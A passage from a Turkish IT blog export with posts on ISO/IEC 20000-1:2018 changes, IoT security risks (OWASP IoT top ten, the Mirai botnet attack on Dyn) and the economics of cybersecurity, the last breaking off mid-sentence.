<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Dokümante edilmiş bilgi gereksinimleri
azaltılmıştır. <o:p></o:p></span></li>
<ul style="margin-top: 0cm;" type="circle">
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Kapasite planı oluşturma zorunluluğu
kaldırılmıştır ve kapasite planlama faaliyeti olarak tanımlanmıştır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Erişebilirlik planı oluşturma zorunluluğu
kaldırılmış ve servis erişebilirlik ihtiyaçları ve hedeflerinin dokümante
edilmesi zorunluluğuna indirgenmiştir.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Konfigürasyon yönetimi veritabanı zorunluluğu
kaldırılmış ve onun yerine konfigürasyon bilgilerinin tanımlanmasına
yönelik ihtiyaçlar tanımlanmıştır.<o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Sürüm politikası gereksinimi kaldırılmıştır.
Onun yerine sürüm türleri ve sıklığının tanımlanması gereksinimi
gelmiştir. <o:p></o:p></span></li>
<li class="MsoNormal" style="mso-list: l1 level2 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Sürekli iyileştirme politikası gereksinimi
kaldırılmıştır. Onun yerine iyileştirme fırsatlarını belirleme
kriterlerini oluşturma zorunluluğu gelmiştir. <o:p></o:p></span></li>
</ul>
<li class="MsoNormal" style="mso-list: l1 level1 lfo1;"><span style="font-size: 12.0pt; line-height: 107%;">Servis raporlamaları ile ilgili detaylı raporlama
gereksinimleri azaltılmıştır. Kuruluşun kendi ihtiyaçlarına göre
oluşturmasına yönelik maddeler eklenmiştir.<o:p></o:p></span></li>
</ul>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 12.0pt; line-height: 107%;">Özet olarak ISO/IEC 20000-1 standardı servis yönetimi
alanında gerçekleşen yenilikleri dikkate alarak güncellenmiş ve her boyutta
firmada daha kolay uygulanabilir hale getirilmiştir. Dokümantasyon yükünün
azaltılması ve konun özü olan işin yapılmasına odaklanılması standartta yer
alan en önemli değişikliklerdendir. Yeni sürüm ISO/IEC 20000-1 standardının ISO
tarafından tanımlanan üst seviye yapı ile uyumlu olması diğer yönetim sistemi
ile entegre işetilmesini daha kolay hale getirmektedir.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 107%;">Kaynaklar<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-left: 36.0pt; mso-list: l0 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-size: 12.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">1)<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span style="font-size: 12.0pt; line-height: 107%;"><a href="https://apmg-international.com/product/isoiec-20000">https://apmg-international.com/product/isoiec-20000</a>
(aktedite belge sahibi firmalar.)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 36.0pt; mso-list: l0 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-size: 12.0pt; line-height: 107%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><span style="mso-list: Ignore;">2)<span style="font: 7.0pt "Times New Roman";"> </span></span></span><!--[endif]--><span style="font-size: 12.0pt; line-height: 107%;">ISO/IEC 20000-1 2018 BT Servis
Yönetimi Gereklilikler Standardı</span></div>
Ali Dinçkanhttp://www.blogger.com/profile/02006595633964771318noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-41271548153033947562018-08-07T15:30:00.000+03:002018-08-07T15:30:06.785+03:00Nesnelerin İnterneti'nin Güvenliği<div align="center" class="MsoNormal" style="text-align: center;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Giriş,
Teknoloji ve İnternet <o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<i>“Citius,
Altius, Fortius”</i> Latince <i>“Daha
hızlı, daha yüksek, daha güçlü”</i> anlamına gelen bu kelimeler, Olimpiyat
Oyunlarının sloganıdır. Olimpiyatlar üzerinden bir benzetimde bulunacak olursak
bu ilkelere dayalı yarışın sadece spor alanında gerçekleşmediğini söyleyebiliriz.
Teknoloji alanındaki gelişmeleri göz önünde bulundurursak tıpkı atletler
arasında daha iyiye varmak için bir yarış oluyormuşçasına hayatımızı daha etkili
ve etkin kılmaya yarayan ilerlemelere sahne olduğunu görebiliriz.</div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Belki de içinde bulunduğumuz döneme
Bilgi Çağı adını vermemize sebep olan ilerlemelerden biri olan İnternet, ağların
belirli protokoller üzerinden birbirine bağlanarak diğer cihazlarla
haberleşmesini sağlayan teknoloji, 1960’larda ABD’de Savunma Bakanlığı’nın
projesi olarak ilk ortaya çıktığında Dünya üzerindeki nüfusun birkaç katı
civarında cihazın bağlantılı olabileceği öngörülebilmiş midir, bilmiyoruz. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Cisco’nun araştırmalarına göre İnternete
bağlanan cihaz cihaz sayısı World Wide Web’in (“www”) kullanıma sunulduğu
1991’de 100 milyon, 2003 yılında 500 milyon civarındaydı. Ancak mobil
cihazların piyasaya sürülmesinin ardından 2010 yılında ise 12,5 milyara ulaştı.
Bu dönemde Dünya nüfusu ise 6,8 milyar insandan oluşmaktaydı. Kısacası, bu
araştırmaya göre bağlantılı cihaz sayısının belirtilen dönemde insan nüfusunu geçtiği
sonucuna varılabilmektedir. 2020 yılında ise bağlantılı cihaz sayısının 50
milyara ulaşacağı öngörülmektedir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-language: TR; mso-no-proof: yes;"><v:shapetype coordsize="21600,21600" filled="f" id="_x0000_t75" o:preferrelative="t" o:spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f">
<v:stroke joinstyle="miter">
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0">
<v:f eqn="sum @0 1 0">
<v:f eqn="sum 0 0 @1">
<v:f eqn="prod @2 1 2">
<v:f eqn="prod @3 21600 pixelWidth">
<v:f eqn="prod @3 21600 pixelHeight">
<v:f eqn="sum @0 0 1">
<v:f eqn="prod @6 1 2">
<v:f eqn="prod @7 21600 pixelWidth">
<v:f eqn="sum @8 21600 0">
<v:f eqn="prod @7 21600 pixelHeight">
<v:f eqn="sum @10 21600 0">
</v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:formulas>
<v:path gradientshapeok="t" o:connecttype="rect" o:extrusionok="f">
<o:lock aspectratio="t" v:ext="edit">
</o:lock></v:path></v:stroke></v:shapetype><v:shape id="Picture_x0020_1" o:spid="_x0000_i1025" style="height: 263pt; mso-wrap-style: square; visibility: visible; width: 468pt;" type="#_x0000_t75">
<v:imagedata o:title="" src="file:///C:\Users\Semih\AppData\Local\Temp\msohtmlclip1\01\clip_image001.jpg">
</v:imagedata></v:shape></span><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Nesnelerin
İnterneti<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
Internet of Things (“Nesnelerin İnterneti”)
terimi ilk defa 1999 yılında Kevin Ashton tarafından ortaya atıldı. Ashton, bu kavramı
fiziksel dünyada birçok yerde bulunan sensörler aracılığıyla sistemlerin İnternet
üzerinden bağlantılı olabilmesi durumu için ifade etmiştir. 2000’lerde
kullanılan mobil cihaz (dizüstü bilgisayar, akıllı telefon, tablet vb.)
sayısındaki artış bu terimin içi dolu, anlamlı hale gelmesini sağladı.
Bağlantılı cihaz sayısının ulaştığı seviye ve cihazların kabiliyetleri sebebiyle
2009 yılı Nesnelerin İnterneti teriminin doğduğu yıl olarak kabul görmektedir. Günümüzde
Nesnelerin İnterneti çözümleri birçok kişinin hayatını, davranış ve karar alma biçimlerini,
sektörlerin ise iş yapış biçimlerini yeniden şekillendirmektedir. Bu çözümler enerji,
veri iletim altyapısı ve trafik sistemleriyle akıllı şehirleri, güvenlik,
sağlık, iklimlendirme sistemleri vasıtasıyla özel hayatımıza yönelik
olabilmektedir. Nesnelerin İnterneti çözümleri yaygın olarak bulunan kablosuz
bağlantılar, anlık veri aktarımı üzerinden gerçek zamanlı veri işleme, gömülü
sistemlerin ve sensörlerin gelişimi sayesinde evrim geçirerek günümüzdeki
halini almıştır.</div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Nesnelerin
İnterneti Üzerine Kaygılar</span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Gün içinde attığımız adım sayımızı
veya gece uyku kalitemizi takip eden bir bileklik, rotamızı optimize etmeye
yarayan bir trafik uygulaması ya da çeşitli medyaları izleyebilmek,
dinleyebilmek amacıyla kullandığımız akıllı televizyonlar, yani Nesnelerin İnterneti
çözümleri etrafımızı çevreleyen her yerdeler, bize kalp atışlarımız kadar yakın
konumdalar.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Yarattığı fırsatlar ve kolaylıkların
nimetlerinden faydalanıyor olsak da, insanlar Nesnelerin İnterneti’nin
oluşturduğu güvenlik ve mahremiyet risklerinden kaygı duymaktadır. İlk
Nesnelerin İnterneti çözümleri kameralar kullanılarak halka açık ortamların gözetimini,
daha sonra konum tabanlı sistemler sebebiyle dolaylı da olsa gezdiğimiz
lokasyonları takip eden ve son olarak evimizin içine kadar giren çözümler
aracılığıyla özel hayatımızı dahi izleyebilecek hale gelmiştir. Yaşadığımız zaman
diliminde bir diğer teknoloji olan Yapay Zeka’nın da ilerlemesiyle insanların
“Biri Bizi Gözetliyor” tarzı bir distopyanın içinde hissedebilmeleri mümkün
görünüyor. Kısacası, kaygılar insanların takip edildiği ve gözetlendiği
düşüncesine sahip olmalarından, kişisel verilerinin yetkisiz kişiler tarafından
amacı dışında kullanılabileceğini düşünmelerinden kaynaklanmaktadır. Bununla
birlikte akıllı sistemler ve altyapıların (enerji vb.) bağlantılı olması
nedeniyle oluşabilecek kesintilerde hayatımızın orta yerine konumlanmış temel hizmetlere
erişememek ve faydalanamamakta bir diğer endişedir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Uzmanlar, insanların kaygılanmalarına
sebep olan bu risklerin Nesnelerin İnterneti’nin gelişim sürecinin yeterli
güvenlik standartları ve regülasyonları olmadan yaşanmasına borçlu olduğunu
ifade etmektedir. İlke olarak <i style="mso-bidi-font-style: normal;">“Secure by
Design”, “Privacy by Design”</i> bir ürünün tasarlanması sırasında güvenlik ve
mahremiyetin özellik olarak ele alınması gerektiğini anlamına gelir. Birçok
Nesnelerin İnterneti çözümünün ortaya çıkış serüvenlerinde bu ilkelerin
gözetilmediği yaşanan ihlal olaylarından anlaşılmaktadır. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Nesnelerin
İnterneti Zafiyetleri</span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="background: white; color: #222222;">Nesnelerin
İnterneti’ne her geçen gün dâhil olan cihaz sayısının arttığına dayanarak
saldırı yüzeyinin de genişlediğini belirtebiliriz. 2014 yılında Nesnelerin İnterneti
cihazlarında bulunan en kritik 10 zafiyeti, web uygulamaları güvenliğinde kar
amacı gütmeyen bir kuruluş olarak hizmet veren OWASP aşağıdaki şekilde
tanımlamıştır.</span><br />
<span style="background: white; color: #222222;"><br /></span>
<br />
<ul>
<li><span style="color: #222222;">I1 Insecure Web Interface (<i>Güvenli olmayan Web Arayüzü</i>)</span></li>
<ul>
<li><span style="color: #222222;">Kullanıcı arayüzünün kolaylıkla keşfedilebilir olması</span></li>
<li><span style="color: #222222;">Ürün kurulumunda kullanılan varsayılan parolaların değiştirilmemesi</span></li>
<li><span style="color: #222222;">Arayüzün Cross-Site Scripting ve SQL Injection zafiyetleri barındırması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I2 Insufficient Authentication/Authorization (<i>Yetkisiz Kimliklendirme ve Yetkilendirme</i>)</span></li>
<ul>
<li><span style="color: #222222;">Kompleks parola politikasının uygulanmaması</span></li>
<li><span style="color: #222222;">Kullanıcı hesap bilgilerinin açık metin olarak aktarılması</span></li>
<li><span style="color: #222222;">Zayıf parola resetleme seçeneklerinin bulunması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I3 Insecure Network Services (<i>Güvenli olmayan Ağ Servisleri</i>)</span></li>
<ul>
<li><span style="color: #222222;">Cihaz üzerinde ihtiyaç duyulmayan açık portların bulunması</span></li>
<li><span style="color: #222222;">Servis dışı bırakma (DoS) saldırılarına açık olması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I4 Lack of Transport Encryption (<i>İletimde Şifreleme Eksikliği</i>)</span></li>
<ul>
<li><span style="color: #222222;">Verilerin açık metin olarak aktarılması</span></li>
<li><span style="color: #222222;">Kabul görmüş şifreleme ayarlarının kurulu olması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I5 Privacy Concerns (<i>Mahremiyet Endişeleri</i>)</span></li>
<ul>
<li><span style="color: #222222;">Gereğinden fazla veri toplanması</span></li>
<li><span style="color: #222222;">Kişisel verilerin saklanması ve iletiminde şifrelemenin kullanılmaması</span></li>
<li><span style="color: #222222;">Veri saklama politikasının bulunmaması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I6 Insecure Cloud Interface (<i>Yetersiz Bulut Arayüzü</i>)</span></li>
<ul>
<li><span style="color: #222222;">Bulut sistemlerin kolay, tahmin edilebilir parolalara sahip olması</span></li>
<li><span style="color: #222222;">Bulut sistemlerin arayüzlerinin kolaylıkla keşfedilebilir olması</span></li>
<li><span style="color: #222222;">Bulut sistemlerin Cross-Site Scripting ve SQL Injection zafiyetleri barındırması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I7 Insecure Mobile Interface (<i>Yetersiz Mobil Arayüzü</i>)</span></li>
<ul>
<li><span style="color: #222222;">Mobil sistemlerin kolay, tahmin edilebilir parolalara sahip olması</span></li>
<li><span style="color: #222222;">Mobil sistemlerin arayüzlerinin kolaylıkla keşfedilebilir olması</span></li>
<li><span style="color: #222222;">Mobil sistemlerin Cross-Site Scripting ve SQL Injection zafiyetleri barındırması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I8 Insufficient Security Configurability (<i>Yetersiz Güvenlik Yapılandırılabilirliği</i>)</span></li>
<ul>
<li><span style="color: #222222;">Yönetici ve kullanıcı yetkilendirmelerinin farklı olarak yapılamaması</span></li>
<li><span style="color: #222222;">Güvenlik kontrollerinin sınırlı olarak değiştirilebilirliği</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I9 Insecure Software/Firmware (<i>Yetersiz Yazılım/Aygıt Yazılımı</i>)</span></li>
<ul>
<li><span style="color: #222222;">Güvenlik açıklıkları bulunduğunda güncellenememesi</span></li>
<li><span style="color: #222222;">Gömülü kullanıcı giriş bilgilerinin bulunması</span></li>
</ul>
</ul>
<ul>
<li><span style="color: #222222;">I10 Poor Physical Security (<i>Zayıf Fiziksel Güvenlik</i>)</span></li>
<ul>
<li><span style="color: #222222;">Cihazların kurcalamaya karşı savunmasız olması</span></li>
<li><span style="color: #222222;">Portlarının (USB vb.) cihaza kurulum arayüzlerine erişebilmek için kullanılabilmesi</span></li>
</ul>
</ul>
<div>
<span style="color: #222222;"><br /></span></div>
</div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="background: white; color: #222222;">Bir Saldırının Anatomisi</span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="background: white; color: #222222;">İnternet’e
açık bir bilgisayarın saldırganlar tarafından ele geçirildikten sonra uzaktan
komutlarla çalıştırılabilmesi sebebiyle bunlara zombi bilgisayar denilmektedir.
Zombi bilgisayarların çoğunlukla bir saldırgan ağına bağlı olarak koordineli
olarak hareket ettirilerek saldırılarda kullanılması söz konusudur. Bilgisayarların
bulunduğu bu ağ, botnet olarak adlandırılmaktadır. </span><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Günümüze
kadar bilinen en büyük Dağıtık Servis Dışı Bırakma (DDoS) saldırısı bir
Nesnelerin İnterneti botnet grubu (“Mirai Botnet”) tarafından 21 Ekim 2016
tarihinde gerçekleşmiştir. Bu botnet grubu, 25 binin üzerinde IP kamera içermekteydi.
Saldırganlar kameralara, kurulumdan sonra değiştirilmemiş varsayılan giriş
bilgilerini kaba kuvvet (“brute force attack”) saldırısıyla istismar ederek
ulaşmışlar ve kontrollerini ele geçirmişlerdir. Dyn adındaki DNS Sunucusuna yapılan
kötü niyeti on milyonlarca istek sebebiyle sunucu gelen normal kullanıcılara
ait taleplere cevap veremez hale gelmiş ve bir süreliğine servis dışı
kalmıştır. ABD’de gerçekleşen bu saldırı sonucunda kullanıcılar birçok Internet
devi şirketlerin çevrimiçi hizmetlerine erişememiştir. <o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">Sonuç</span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;">İnternet’in ortaya çıkışından itibaren
insanlığın bağlantılı olma eğilimi yükselen bir hızla günümüze ulaşmıştır ve
önümüzdeki dönemde ivmelenerek devam edeceği öngörülmektedir. Giderek artan bir
hızla büyüyen ve hayatımızı şekillendiren teknolojilerden Nesnelerin İnterneti
yarattığı faydalarla birlikte risklere de sahiptir. Bu durum madalyonun iki
yüzü gibi hem olumlu hem de olumsuz durumların doğmasına sebep olabilir. Nesnelerin
İnterneti çözümleri, yaşam döngülerini düzenleyen regülasyonların ve
standartların olmaması nedeniyle birçok zafiyete barındırmaktadır. Bu açıklıklar
kullanılarak hem özel hem de toplumsal hayatlarımızı ilgilendiren saldırılarla karşılaşılmaktadır.<span style="mso-spacerun: yes;"> </span>Nazım Hikmet’ten bir alıntıyla bitirecek
olursak, büyük şair 24 Eylül 1945’te yazdığı şiirde “En güzel günlerimiz henüz
yaşamadıklarımız” diyordu. Nesnelerin İnterneti hayatımıza getirdiği ve
getireceği rahatlıkla en güzel günlerimizi vadediyor. Ancak, diğer taraftan
bağlantılı sistemler barındırdıkları zafiyetlerle daha önce görmediğimiz kadar
kötü, kâbus dolu günlere de gebe olabilir.<o:p></o:p></span></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-76437862850402688312018-07-13T15:15:00.000+03:002018-07-13T15:15:05.667+03:00Güvenlik Ekonomisinin Kinetiği<br />
<div class="MsoNormal" style="text-align: justify;">
Rehin alınan bilgisayarlar nedeniyle
hizmet dışı kalan üretim bantları, kişisel verilerin çalınması sebebiyle kimlik
hırsızlığı/sahtecilikler ve hatta hackerların (saldırganlar) ekonomik ve
teknolojik olarak dünyanın en gelişmiş ülkesinin seçim sonuçlarını etkilediği
şüphesi son dönemlerin en bilinen siber olayları arasında yer almaktadır. World
Economic Forum (Dünya Ekonomik Forumu) şirketlerin üst düzey yöneticileriyle gerçekleştirdiği
2018 yılı Global Risk Raporu’na göre Siber Saldırılar ankete katılanların en
çok endişe duyduğu risk olarak değerlendirilmiştir.<a href="file:///C:/Users/Semih/Downloads/G%C3%BCvenlik%20Ekonomisinin%20Kineti%C4%9Fi%20Ali.docx#_ftn1" name="_ftnref1" style="mso-footnote-id: ftn1;" title=""><span class="MsoFootnoteReference"><span style="mso-special-character: footnote;"><!--[if !supportFootnotes]--><span class="MsoFootnoteReference"><span style="font-family: "calibri" , "sans-serif"; font-size: 11.0pt; line-height: 107%;">[1]</span></span><!--[endif]--></span></span></a>
Gemisini tehlikeli ve dalgalı sularda yüzdüren kaptan edasıyla korsanlar
tarafından hedef alınan şirketlerin üst düzey yöneticileri siber güvenlik
tehditlerini ve önlemlerini yönetim kurullarının gündemlerine taşımaktadırlar.
Bu yazımızda tavşana kaç, tazıya tut diyen siber güvenlik ekonomisinin ana hatlarıyla
oluşum ve gelişim eğilimlerini konu alacağız. <span style="mso-spacerun: yes;"> </span><o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">Saldırganların Motivasyonu</span></b> <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
Siber olayların anatomisi
incelendiğinde, döneminin teknolojik imkânları ve özelliklerinden bağımsız
olarak değerlendirilemeyeceği çıkarımında bulunabiliriz. Bilgi Teknolojilerinin
deneysellikten kurtulup, pratik olarak da hayatımıza girdiği 1980’lerde imkânlar
çoğunlukla akademik amaçlarla kullanılmaktaydı. Bu akademik kullanıcılar teknik
olarak bilinçli bireyler olmalarının yanı sıra <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">eğlence amacıyla</i></b>
sistemlerin zayıflıklarını istismar edebilmekteydi. 2000’li yıllara gelindiğinde
“.com” furyasının yaşandığı, web sitelerin revaçta olduğu bir dönemde
saldırganlar, çoğunlukla kamuya açık bu siteleri hackleyip geride izlerini
bırakmaya çalışan yani <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">şöhret amacıyla</i></b> saldırı
gerçekleştirenlerdi. Devamında, 2000’lerin ilk döneminde saldırganlar sadece
geride iz bırakmayı değil sistemleri de ele geçirerek verileri çalma ve değiştirme
yoluyla <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">maddi kazançlar sağlamak</i></b> amacıyla saldırılarda bulunmuşlardır.
Devletlerin ve özel sektörün teknoloji kullanımı ve bağımlılığının artmasının
ardından saldırganlar, <b style="mso-bidi-font-weight: normal;"><i style="mso-bidi-font-style: normal;">politik ve hacktivist</i></b> amaçlarla
saldırılar gerçekleştirmeye başlamışlardır. Bu saldırılar devlet destekli
olarak enerji ve kritik altyapılara zarar vermek, ticari veya devlet sırlarını çalmak
üzerine olduğu kadar toplumsal olarak şeffaflık ve hesap verilebilirliği
sağlamak amacıyla politikacıları hedef alan örneklerine rastlanmaktadır. <b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;"><o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">Saldırı Yüzeyi<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
Bu konu başlığını bağlantılılık
ve veri hacminin genişlemesi olarak da isimlendirebilmek mümkün olmakla
birlikte, bağlantının saldırgan tarafından bilgi barındıran, işleyen, ileten
ortamlara erişme ve istismar etmesini sağladığı gerekçesiyle saldırı yüzeyi
olarak adlandırılmıştır. Bilgisayar ağlarının kurulması ve yaygınlaşmasıyla bu
bilgisayar ağlarının bağlantılı olduğu sistemlere de saldırı gerçekleştirilmeye
başlanmıştır. Dolayısıyla, bağlantılılık hareketiyle saldırı hareketinin eş
güdümlü ilerlediği ifade edilebilir. Örneğin, günümüzün trendi olan Nesnelerin
Internetini değerlendirecek olursak bağlantılı cihaz sayısının giderek
arttığını, bu cihazların akıllı sistemler, kritik altyapılar ve kişisel veriler
içeren uygulamalar olarak birçok siber saldırının hedefi olduğunu
belirtebiliriz. Saldırı yüzeyi vasıtasıyla istismar edilen kaynaklar hedef
olduğu kadar, “enfekte sistemler” üzerinden yeni saldırıların
gerçekleştirilebilmesi sebebiyle tehdit de olabilmektedir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;">Savunmanın Maliyeti ile Saldırının Maliyeti Arasındaki Farklılıklar <o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 107%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
Bir siber olayın taraflarını
saldırganlar ve savunanlar olarak ele alabiliriz. Bilgi ve İletişim
Teknolojilerinin ortaya çıkmasından itibaren bu iki taraf arasında yaşanan
üstünlük mücadelesini “Hırsıza kilit dayanmaz” atasözümüzle açıklamak doğru
olacaktır. Savunan taraf kendisini güvende hissetmek için birçok önleyici,
caydırıcı, tespit edici adımlar atsa da saldıranlar bu önlemleri ekarte edecek
veya etrafından dolaşacak yolları bulmaktadır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Taraflar arasındaki mücadele
tarihsel olarak incelendiğinde, saldırıların gerçekleştirilmesi için gerekli
olan yetenek kümesinin ve özelliklerinin teknolojilerin ortaya çıktığı dönem
ile yaygınlaştığı dönem arasında ciddi farklılıklara sahne olduğunu
görebilmekteyiz. Başlangıç döneminde teknolojik özelliklerin anlaşılması ve
istismar edilebilmesi yerleşik bir kültür olmaması sebebiyle saldırganlar
tarafından nadiren ve zorlukla gerçekleştirilebilmekteydi. Gelişme döneminde,
teknolojileri anlayan ve kendi amaçları uğruna kullanabilen bireyler ve gruplar
ortaya çıktı ve istismarı gerçekleştirebilmek için kendileri için gerekli olan araçları/scriptleri
yazabilmekteydiler. Teknolojik olarak kültürün oluştuğu ve olgunlaştığı dönemde
ise topluluklar (community) ortaya çıktı ve bunlar otomatize araçlar ve
uygulamaları oluşturarak güvenlik dünyasının çehresini değiştirdiler. Otomatize
araçlar bazı örneklerinde ara yüzlere de sahip ve kolaylıkla erişilebilir
olarak, bir tuşla hedef sistemi tarayıp zafiyetlerini raporlar hale geldi. Bu
durum sonuç olarak aracı kullanan kişilerin gereksinim duyduğu yetenek kümesini
daraltmakta ve doğal olarak sıradan kişiler tarafından saldırı gerçekleştirilebilmesine
imkân tanımaktadır. <span style="mso-spacerun: yes;"> </span><o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Siber olayı savunanlar tarafından
ele aldığımızda yani işletmeler, sivil toplum, kamu kuruluşları vb. doğaları
gereği var olma amaçlarının kârlılık, pazar payı, sosyal fayda olduğunu,
kaynaklarını fırsatları kovalamaya yönelik olarak kullandıklarını
görebilmekteyiz. Bu durumda kurum içinde savunma amacıyla yeterli kaynakların
tahsis edilmediği, sorumluların atanmadığı, paydaşlarda bilincin
oluşturulmadığı örneklerle karşılaşılabilmektedir. İyimser bir varsayımda
bulunarak risk odaklı yönetilen kurumları ele alırsak, onların da yatırım
